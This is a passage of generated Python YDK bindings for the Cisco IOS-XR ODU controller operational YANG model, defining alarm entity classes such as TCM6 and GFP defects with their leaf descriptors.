        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Ais, self).__init__()

        self.yang_name = "tcm6-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-ais"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Ais']['meta_info']
class Tcm6Ltc(_Entity_):
    """
    TCM6 Loss of Tandem connection Monitoring

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc, self).__init__()

        self.yang_name = "tcm6-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-ltc"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc']['meta_info']
class Tcm6Oci(_Entity_):
    """
    TCM6 Open Connection Indication

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Oci, self).__init__()

        self.yang_name = "tcm6-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-oci"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Oci']['meta_info']
class Tcm6Lck(_Entity_):
    """
    TCM6 Upstream Connection Locked

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Lck, self).__init__()

        self.yang_name = "tcm6-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-lck"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Lck']['meta_info']
class Tcm6Iae(_Entity_):
    """
    TCM6 Incoming Alignment Error

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Iae, self).__init__()

        self.yang_name = "tcm6-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-iae"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Iae']['meta_info']
class Tcm6Biae(_Entity_):
    """
    TCM6 Backward Incoming Alignment Error

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Biae, self).__init__()

        self.yang_name = "tcm6-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-biae"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Biae']['meta_info']
class Tcm6Bdi(_Entity_):
    """
    TCM6 Backward Defect Monitoring

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi, self).__init__()

        self.yang_name = "tcm6-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-bdi"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi']['meta_info']
class Tcm6Tim(_Entity_):
    """
    TCM6 Trail Trace Identifier Mismatch

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6Tim, self).__init__()

        self.yang_name = "tcm6-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-tim"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6Tim']['meta_info']
class Tcm6SfBer(_Entity_):
    """
    TCM6 SF BER alarm

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer, self).__init__()

        self.yang_name = "tcm6-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-sf-ber"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer']['meta_info']
class Tcm6SdBer(_Entity_):
    """
    TCM6 SD BER alarm

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer, self).__init__()

        self.yang_name = "tcm6-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm6-sd-ber"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer']['meta_info']
class GfpLfd(_Entity_):
    """
    Loss Of Frame Delineation

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.GfpLfd, self).__init__()

        self.yang_name = "gfp-lfd"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "gfp-lfd"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLfd, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLfd']['meta_info']
class GfpLocs(_Entity_):
    """
    Loss Of Client Signal

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.GfpLocs, self).__init__()

        self.yang_name = "gfp-locs"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "gfp-locs"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLocs, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLocs']['meta_info']
class GfpLoccs(_Entity_):
    """
    Loss Of Character Synchronization

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.GfpLoccs, self).__init__()

        self.yang_name = "gfp-loccs"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "gfp-loccs"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpLoccs, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpLoccs']['meta_info']
class GfpUpm(_Entity_):
    """
    User Payload Mismatch
    .. attribute:: reporting_enabled
    Is reporting enabled?
    **type**\: bool
    **config**\: False
    .. attribute:: is_detected
    Is defect detected?
    **type**\: bool
    **config**\: False
    .. attribute:: is_asserted
    Is defect declared?
    **type**\: bool
    **config**\: False
    .. attribute:: counter
    Alarm counter
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.GfpUpm, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "gfp-upm"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container: no child classes
        # Maps python attribute name -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values start unset; assignments go through __setattr__ below.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "gfp-upm"
        # NOTE(review): freezing appears to be required as the LAST statement of
        # __init__ -- _perform_setattr (in _Entity_, outside this file) presumably
        # gates attribute writes on _is_frozen; confirm against _Entity_.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all attribute writes through the base-class validator, which
        # restricts them to the declared leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.GfpUpm, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Meta information is kept in a generated side table, imported lazily.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.GfpUpm']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information record for the Alarm node."""
    # Lazy import keeps the (large) meta module off the import path until asked for.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper
    meta_entry = _Cisco_IOS_XR_controller_odu_oper._meta_table['Odu.Controllers.Controller.Info.Alarm']
    return meta_entry['meta_info']
class TeCtxData(_Entity_):
    """
    Label Get Data
    .. attribute:: te_tunnel_info
    Tunnel Information
    **type**\: :py:class:`TeTunnelInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo>`
    **config**\: False
    .. attribute:: gmpls_req_time
    Req Time
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: ctxt_type
    Ctxt Type
    **type**\: :py:class:`OtmOpticalRmCtxt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxt>`
    **config**\: False
    .. attribute:: rm_type
    Rm Type
    **type**\: :py:class:`OtmOpticalRmCtxtRm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OtmOpticalRmCtxtRm>`
    **config**\: False
    """

    # YANG module identity for this schema node.
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3-compatible super() call (this generated module supports both).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.TeCtxData, self).__init__()
        # Schema bookkeeping: YANG names and position of this node in the tree.
        self.yang_name = "te-ctx-data"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single child container: the nested TeTunnelInfo class defined below.
        self._child_classes = OrderedDict([("te-tunnel-info", ("te_tunnel_info", Odu.Controllers.Controller.Info.TeCtxData.TeTunnelInfo))])
